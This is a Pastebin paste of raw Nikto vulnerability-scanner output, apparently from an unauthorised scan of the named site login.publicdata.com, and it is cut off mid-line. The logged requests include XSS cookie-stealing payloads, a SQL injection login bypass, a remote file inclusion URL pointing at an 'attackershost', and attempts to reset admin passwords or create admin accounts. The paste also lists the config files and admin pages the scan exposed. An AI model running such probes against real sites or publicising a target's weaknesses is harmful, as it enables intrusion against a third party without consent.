Advertisement
Guest User

Untitled

a guest
Jan 1st, 2019
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.36 KB | None | 0 0
  1. Follow @aptAnarch
  2.  
  3.  
  4.  
  5. Anarchy@Kali~ nikto -h login.publicdata.com/promotion --output ~/Desktop/Publicdata.txt
  6.  
  7. + Target Host: login.publicdata.com
  8. + Target Port: 443
  9. + GET The anti-clickjacking X-Frame-Options header is not present.
  10. + GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  11. + GET The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  12. + GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  13. + GET The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  14. + NALFGQUN Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  15. + GET /promotion/tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
  16. + GET /promotion/forums//admin/config.php: PHP Config file may contain database IDs and passwords.
  17. + GET /promotion/forums//adm/config.php: PHP Config file may contain database IDs and passwords.
  18. + GET /promotion/forums//administrator/config.php: PHP Config file may contain database IDs and passwords.
  19. + GET /promotion/forums/config.php: PHP Config file may contain database IDs and passwords.
  20. + OSVDB-2411: GET /promotion/hola/admin/cms/htmltags.php?datei=./sec/data.php: hola-cms-1.2.9-10 may reveal the administrator ID and password.
  21. + OSVDB-59620: GET /promotion/inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
  22. + OSVDB-59619: GET /promotion/inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
  23. + OSVDB-59618: GET /promotion/inc/dbase.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
  24. + OSVDB-2703: GET /promotion/geeklog/users.php: Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.
  25. + OSVDB-8204: GET /promotion/gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
  26. + GET /promotion/guestbook/admin.php: Guestbook admin page available without authentication.
  27. + GET /promotion/basilix/mbox-list.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page
  28. + GET /promotion/basilix/message-read.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page
  29. + OSVDB-42680: GET /promotion/vider.php3: MySimpleNews may allow deleting of news items without authentication.
  30. + GET /promotion/administrator/gallery/uploadimage.php: Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.
  31. + GET /promotion/pafiledb/includes/team/file.php: paFileDB 3.1 and below may allow file upload without authentication.
  32. + GET /promotion/basilix/compose-attach.php3: BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads
  33. + GET /promotion/admin/config.php: PHP Config file may contain database IDs and passwords.
  34. + GET /promotion/adm/config.php: PHP Config file may contain database IDs and passwords.
  35. + GET /promotion/administrator/config.php: PHP Config file may contain database IDs and passwords.
  36. + GET /promotion/contents.php?new_language=elvish&mode=select: Requesting a file with an invalid language selection from DC Portal may reveal the system path.
  37. + OSVDB-53303: GET /promotion/simplebbs/users/users.php: Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.
  38. + OSVDB-44056: GET /promotion/sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
  39. + GET /promotion/typo3conf/localconf.php: TYPO3 config file found.
  40. + GET /promotion/cms/typo3conf/localconf.php: TYPO3 config file found.
  41. + GET /promotion/site/typo3conf/localconf.php: TYPO3 config file found.
  42. + GET /promotion/typo/typo3conf/localconf.php: TYPO3 config file found.
  43. + GET /promotion/typo3/typo3conf/localconf.php: TYPO3 config file found.
  44. + GET /promotion/webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
  45. + OSVDB-27071: GET /promotion/phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
  46. + GET /promotion/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
  47. + GET /promotion/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
  48. + GET /promotion/anthill/login.php: Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02
  49. + GET /promotion/cbms/cbmsfoot.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  50. + GET /promotion/cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  51. + GET /promotion/cbms/editclient.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  52. + GET /promotion/cbms/passgen.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  53. + GET /promotion/cbms/realinv.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  54. + GET /promotion/cbms/usersetup.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  55. + GET /promotion/admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
  56. + GET /promotion/config.php: PHP Config file may contain database IDs and passwords.
  57. + OSVDB-5280: GET /promotion/instantwebmail/message.php: Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.
  58. + OSVDB-29786: GET /promotion/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  59. + OSVDB-29786: GET /promotion/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  60. + GET /promotion/admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
  61. + OSVDB-3233: GET /promotion/admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
  62. + OSVDB-5034: GET /promotion/admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
  63. + OSVDB-5178: GET /promotion/dostuff.php?action=modify_user: Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/
  64. + OSVDB-35876: GET /promotion/agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
  65. + GET /promotion/pmlite.php: A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details.
  66. + OSVDB-2881: GET /promotion/pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
  67. + GET /promotion/logjam/showhits.php: Logjam may possibly allow remote command execution via showhits.php page.
  68. + GET /promotion/manual.php: Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.
  69. + OSVDB-14329: GET /promotion/smssend.php: PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php
  70. + OSVDB-113: GET /promotion/ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
  71. + GET /promotion/pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
  72. + OSVDB-2225: GET /promotion/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
  73. + OSVDB-155: GET /promotion/counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
  74. + OSVDB-3092: GET /promotion/admin.html: This might be interesting...
  75. + OSVDB-3092: GET /promotion/admin.php: This might be interesting...
  76. + OSVDB-3092: GET /promotion/admin.php3: This might be interesting...
  77. + OSVDB-3092: GET /promotion/easylog/easylog.html: This might be interesting...
  78. + OSVDB-3092: GET /promotion/log.html: This might be interesting...
  79. + OSVDB-3092: GET /promotion/logfile.html: This might be interesting...
  80. + OSVDB-3092: GET /promotion/logger.html: This might be interesting...
  81. + OSVDB-3092: GET /promotion/piranha/secure/passwd.php3: This might be interesting...
  82. + OSVDB-3092: GET /promotion/stats.html: This might be interesting...
  83. + OSVDB-3092: GET /promotion/test.html: This might be interesting...
  84. + OSVDB-3092: GET /promotion/wwwstats.html: This might be interesting...
  85. + OSVDB-3093: GET /promotion/admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
  86. + OSVDB-3093: GET /promotion/admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  87. + OSVDB-3093: GET /promotion/admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  88. + OSVDB-3093: GET /promotion/admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  89. + OSVDB-3093: GET /promotion/admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  90. + OSVDB-3093: GET /promotion/admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
  91. + OSVDB-3093: GET /promotion/admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
  92. + OSVDB-3093: GET /promotion/admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  93. + OSVDB-3093: GET /promotion/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  94. + OSVDB-3093: GET /promotion/admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  95. + OSVDB-3093: GET /promotion/admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
  96. + OSVDB-3093: GET /promotion/admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
  97. + OSVDB-3093: GET /promotion/admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  98. + OSVDB-3093: GET /promotion/admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
  99. + OSVDB-3093: GET /promotion/admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
  100. + OSVDB-3093: GET /promotion/admin_t/include/aff_liste_langue.php: This might be interesting... has been seen in web logs from an unknown scanner.
  101. + OSVDB-3093: GET /promotion/aff_news.php: This might be interesting... has been seen in web logs from an unknown scanner.
  102. + OSVDB-3093: GET /promotion/ashnews.php: This might be interesting... has been seen in web logs from an unknown scanner.
  103. + OSVDB-3093: GET /promotion/auth.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  104. + OSVDB-3093: GET /promotion/b2-tools/gm-2-b2.php: This might be interesting... has been seen in web logs from an unknown scanner.
  105. + OSVDB-3093: GET /promotion/basilix.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  106. + OSVDB-3093: GET /promotion/bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting... has been seen in web logs from an unknown scanner.
  107. + OSVDB-3093: GET /promotion/board/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  108. + OSVDB-3093: GET /promotion/caupo/admin/admin_workspace.php: This might be interesting... has been seen in web logs from an unknown scanner.
  109. + OSVDB-3093: GET /promotion/chat_dir/register.php: This might be interesting... has been seen in web logs from an unknown scanner.
  110. + OSVDB-3093: GET /promotion/checkout_payment.php: This might be interesting... has been seen in web logs from an unknown scanner.
  111. + OSVDB-3093: GET /promotion/community/forumdisplay.php: This might be interesting... has been seen in web logs from an unknown scanner.
  112. + OSVDB-3093: GET /promotion/community/index.php?analized=anything: This might be interesting... has been seen in web logs from an unknown scanner.
  113. + OSVDB-3093: GET /promotion/community/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  114. + OSVDB-3093: GET /promotion/compte.php: This might be interesting... has been seen in web logs from an unknown scanner.
  115. + OSVDB-3093: GET /promotion/convert-date.php: This might be interesting... has been seen in web logs from an unknown scanner.
  116. + OSVDB-3093: GET /promotion/cutenews/comments.php: This might be interesting... has been seen in web logs from an unknown scanner.
  117. + OSVDB-3093: GET /promotion/cutenews/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
  118. + OSVDB-3093: GET /promotion/cutenews/shownews.php: This might be interesting... has been seen in web logs from an unknown scanner.
  119. + OSVDB-3093: GET /promotion/db.php: This might be interesting... has been seen in web logs from an unknown scanner.
  120. + OSVDB-3093: GET /promotion/dcp/advertiser.php: This might be interesting... has been seen in web logs from an unknown scanner.
  121. + OSVDB-3093: GET /promotion/defines.php: This might be interesting... has been seen in web logs from an unknown scanner.
  122. + OSVDB-3093: GET /promotion/dltclnt.php: This might be interesting... has been seen in web logs from an unknown scanner.
  123. + OSVDB-3093: GET /promotion/doc/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  124. + OSVDB-3093: GET /promotion/dotproject/modules/files/index_table.php: This might be interesting... has been seen in web logs from an unknown scanner.
  125. + OSVDB-3093: GET /promotion/dotproject/modules/projects/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  126. + OSVDB-3093: GET /promotion/dotproject/modules/projects/view.php: This might be interesting... has been seen in web logs from an unknown scanner.
  127. + OSVDB-3093: GET /promotion/dotproject/modules/projects/vw_files.php: This might be interesting... has been seen in web logs from an unknown scanner.
  128. + OSVDB-3093: GET /promotion/dotproject/modules/tasks/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  129. + OSVDB-3093: GET /promotion/dotproject/modules/tasks/viewgantt.php: This might be interesting... has been seen in web logs from an unknown scanner.
  130. + OSVDB-3093: GET /promotion/email.php: This might be interesting... has been seen in web logs from an unknown scanner.
  131. + OSVDB-3093: GET /promotion/emml_email_func.php: This might be interesting... has been seen in web logs from an unknown scanner.
  132. + OSVDB-3093: GET /promotion/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  133. + OSVDB-3093: GET /promotion/enteteacceuil.php: This might be interesting... has been seen in web logs from an unknown scanner.
  134. + OSVDB-3093: GET /promotion/eventcal2.php.php: This might be interesting... has been seen in web logs from an unknown scanner.
  135. + OSVDB-3093: GET /promotion/faqman/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  136. + OSVDB-3093: GET /promotion/filemanager/index.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  137. + OSVDB-3093: GET /promotion/filemgmt/brokenfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  138. + OSVDB-3093: GET /promotion/filemgmt/singlefile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  139. + OSVDB-3093: GET /promotion/filemgmt/viewcat.php: This might be interesting... has been seen in web logs from an unknown scanner.
  140. + OSVDB-3093: GET /promotion/filemgmt/visit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  141. + OSVDB-3093: GET /promotion/forum/mainfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  142. + OSVDB-3093: GET /promotion/forum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  143. + OSVDB-3093: GET /promotion/forum/newreply.php: This might be interesting... has been seen in web logs from an unknown scanner.
  144. + OSVDB-3093: GET /promotion/forum/newthread.php: This might be interesting... has been seen in web logs from an unknown scanner.
  145. + OSVDB-3093: GET /promotion/forum/viewtopic.php: phpBB found.
  146. + OSVDB-3093: GET /promotion/functions.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  147. + OSVDB-3093: GET /promotion/globals.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  148. + OSVDB-3093: GET /promotion/include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
  149. + OSVDB-3093: GET /promotion/include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
  150. + OSVDB-3093: GET /promotion/includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  151. + OSVDB-3093: GET /promotion/includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  152. + OSVDB-3093: GET /promotion/intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
  153. + OSVDB-3093: GET /promotion/invitefriends.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  154. + OSVDB-3093: GET /promotion/ipchat.php: This might be interesting... has been seen in web logs from an unknown scanner.
  155. + OSVDB-3093: GET /promotion/ixmail_netattach.php: This might be interesting... has been seen in web logs from an unknown scanner.
  156. + OSVDB-3093: GET /promotion/kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  157. + OSVDB-3093: GET /promotion/kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
  158. + OSVDB-3093: GET /promotion/ldap.search.php3?ldap_serv=nonsense%20: This might be interesting... has been seen in web logs from an unknown scanner.
  159. + OSVDB-3093: GET /promotion/livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  160. + OSVDB-3093: GET /promotion/login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
  161. + OSVDB-3093: GET /promotion/mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
  162. + OSVDB-3093: GET /promotion/mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
  163. + OSVDB-3093: GET /promotion/mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
  164. + OSVDB-3093: GET /promotion/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
  165. + OSVDB-3093: GET /promotion/mod.php: This might be interesting... has been seen in web logs from an unknown scanner.
  166. + OSVDB-3093: GET /promotion/modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  167. + OSVDB-3093: GET /promotion/modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
  168. + OSVDB-3093: GET /promotion/newtopic.php: This might be interesting... has been seen in web logs from an unknown scanner.
  169. + OSVDB-3093: GET /promotion/nphp/nphpd.php: This might be interesting... has been seen in web logs from an unknown scanner.
  170. + OSVDB-3093: GET /promotion/options.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  171. + OSVDB-3093: GET /promotion/oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
  172. + OSVDB-3093: GET /promotion/php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  173. + OSVDB-3093: GET /promotion/pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  174. + OSVDB-3093: GET /promotion/poppassd.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
  175. + OSVDB-3093: GET /promotion/product_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
  176. + OSVDB-3093: GET /promotion/prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  177. + OSVDB-3093: GET /promotion/protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
  178. + OSVDB-3093: GET /promotion/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=': This might be interesting... has been seen in web logs from an unknown scanner.
  179. + OSVDB-3093: GET /promotion/protection.php: This might be interesting... has been seen in web logs from an unknown scanner.
  180. + OSVDB-3093: GET /promotion/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
  181. + OSVDB-3093: GET /promotion/pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
  182. + OSVDB-3093: GET /promotion/room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
  183. + OSVDB-3093: GET /promotion/screen.php: This might be interesting... has been seen in web logs from an unknown scanner.
  184. + OSVDB-3093: GET /promotion/security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
  185. + OSVDB-3093: GET /promotion/sendphoto.php: This might be interesting... has been seen in web logs from an unknown scanner.
  186. + OSVDB-3093: GET /promotion/shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  187. + OSVDB-3093: GET /promotion/shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
  188. + OSVDB-3093: GET /promotion/shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
  189. + OSVDB-3093: GET /promotion/spelling.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
  190. + OSVDB-3093: GET /promotion/staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  191. + OSVDB-3093: GET /promotion/status.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  192. + OSVDB-3093: GET /promotion/supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  193. + OSVDB-3093: GET /promotion/supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
  194. + OSVDB-3093: GET /promotion/tinymsg.php: This might be interesting... has been seen in web logs from an unknown scanner.
  195. + OSVDB-3093: GET /promotion/topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  196. + OSVDB-3093: GET /promotion/topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  197. + OSVDB-3093: GET /promotion/ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  198. + OSVDB-3093: GET /promotion/tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
  199. + OSVDB-3093: GET /promotion/tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
  200. + OSVDB-3093: GET /promotion/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
  201. + OSVDB-3093: GET /promotion/cms/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
  202. + OSVDB-3093: GET /promotion/site/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
  203. + OSVDB-3093: GET /promotion/typo/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
  204. + OSVDB-3093: GET /promotion/typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
  205. + OSVDB-3093: GET /promotion/useraction.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  206. + OSVDB-3093: GET /promotion/wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  207. + OSVDB-3093: GET /promotion/wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
  208. + OSVDB-3093: GET /promotion/webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
  209. + OSVDB-3093: GET /promotion/webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
  210. + OSVDB-3093: GET /promotion/webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  211. + OSVDB-3093: GET /promotion/x_stat_admin.php: This might be interesting... has been seen in web logs from an unknown scanner.
  212. + OSVDB-3093: GET /promotion/zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  213. + OSVDB-3093: GET /promotion/_head.php: This might be interesting... has been seen in web logs from an unknown scanner.
  214. + OSVDB-3233: GET /promotion/tomcat-docs/index.html: Default Apache Tomcat documentation found.
  215. + OSVDB-3233: GET /promotion/php/index.php: Monkey Http Daemon default PHP file found.
  216. + OSVDB-3233: GET /promotion/help/home.html: Default Netscape manual found. All default pages should be removed.
  217. + OSVDB-3282: GET /promotion/uploader.php: This script may allow arbitrary files to be uploaded to the remote server.
  218. + OSVDB-3396: GET /promotion/mlog.html: Remote file read vulnerability 1999-0068
  219. + OSVDB-3396: GET /promotion/php/mlog.html: Remote file read vulnerability 1999-0346
  220. + OSVDB-3501: GET /promotion/_private/form_results.html: This file may contain information submitted by other web users via forms. CVE-1999-1052.
  221. + OSVDB-3591: GET /promotion/project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
  222. + OSVDB-4161: GET /promotion/userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
  223. + OSVDB-9624: GET /promotion/pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
  224. + OSVDB-9624: GET /promotion/admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
  225. + OSVDB-3233: GET /promotion/aplogon.html: Oracle Applications Portal Page
  226. + OSVDB-3233: GET /promotion/appdet.html: Oracle Applications Portal Pages
  227. + OSVDB-3092: GET /promotion/install/install.php: Install file found.
  228. + OSVDB-3092: GET /promotion/install.php: install.php file found.
  229. + OSVDB-3092: GET /promotion/upgrade.php: upgrade.php was found.
  230. + OSVDB-3092: GET /promotion/xmlrpc.php: xmlrpc.php was found.
  231. + GET /promotion/admin1.php: Admin login page found.
  232. + GET /promotion/admin/account.html: Admin login page/section found.
  233. + GET /promotion/admin/account.php: Admin login page/section found.
  234. + GET /promotion/admin/controlpanel.html: Admin login page/section found.
  235. + GET /promotion/admin/controlpanel.php: Admin login page/section found.
  236. + GET /promotion/admin/cp.html: Admin login page/section found.
  237. + GET /promotion/admin/cp.php: Admin login page/section found.
  238. + GET /promotion/admin/home.php: Admin login page/section found.
  239. + GET /promotion/admin/index.html: Admin login page/section found.
  240. + GET /promotion/admin/login.html: Admin login page/section found.
  241. + GET /promotion/admin/login.php: Admin login page/section found.
  242. + GET /promotion/admin1.html: Admin login page/section found.
  243. + GET /promotion/admin2.html: Admin login page/section found.
  244. + GET /promotion/admin2.php: Admin login page/section found.
  245. + GET /promotion/admincontrol.html: Admin login page/section found.
  246. + GET /promotion/admincontrol.php: Admin login page/section found.
  247. + GET /promotion/administr8.html: Admin login page/section found.
  248. + GET /promotion/administr8.php: Admin login page/section found.
  249. + GET /promotion/administracao.php: Admin login page/section found.
  250. + GET /promotion/administraçao.php: Admin login page/section found.
  251. + GET /promotion/administracion.php: Admin login page/section found.
  252. + GET /promotion/administrateur.php: Admin login page/section found.
  253. + GET /promotion/administration.html: Admin login page/section found.
  254. + GET /promotion/administration.php: Admin login page/section found.
  255. + GET /promotion/administrator.html: Admin login page/section found.
  256. + GET /promotion/administrator.php: Admin login page/section found.
  257. + GET /promotion/administrator/account.html: Admin login page/section found.
  258. + GET /promotion/administrator/account.php: Admin login page/section found.
  259. + GET /promotion/administrator/index.html: Admin login page/section found.
  260. + GET /promotion/administrator/index.php: Admin login page/section found.
  261. + GET /promotion/administrator/login.html: Admin login page/section found.
  262. + GET /promotion/administrator/login.php: Admin login page/section found.
  263. + GET /promotion/adminisztrátora.php: Admin login page/section found.
  264. + GET /promotion/adminpanel.html: Admin login page/section found.
  265. + GET /promotion/adminpanel.php: Admin login page/section found.
  266. + GET /promotion/admins.html: Admin login page/section found.
  267. + GET /promotion/admins.php: Admin login page/section found.
  268. + GET /promotion/amministratore.php: Admin login page/section found.
  269. + GET /promotion/beheerder.php: Admin login page/section found.
  270. + GET /promotion/ccms/index.php: Admin login page/section found.
  271. + GET /promotion/ccms/login.php: Admin login page/section found.
  272. + GET /promotion/controlpanel.html: Admin login page/section found.
  273. + GET /promotion/controlpanel.php: Admin login page/section found.
  274. + GET /promotion/cp.html: Admin login page/section found.
  275. + GET /promotion/cp.php: Admin login page/section found.
  276. + GET /promotion/fileadmin.html: Admin login page/section found.
  277. + GET /promotion/fileadmin.php: Admin login page/section found.
  278. + GET /promotion/login.html: Admin login page/section found.
  279. + GET /promotion/login.php: Admin login page/section found.
  280. + GET /promotion/modelsearch/login.php: Admin login page/section found.
  281. + GET /promotion/moderator.html: Admin login page/section found.
  282. + GET /promotion/moderator.php: Admin login page/section found.
  283. + GET /promotion/moderator/admin.h
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement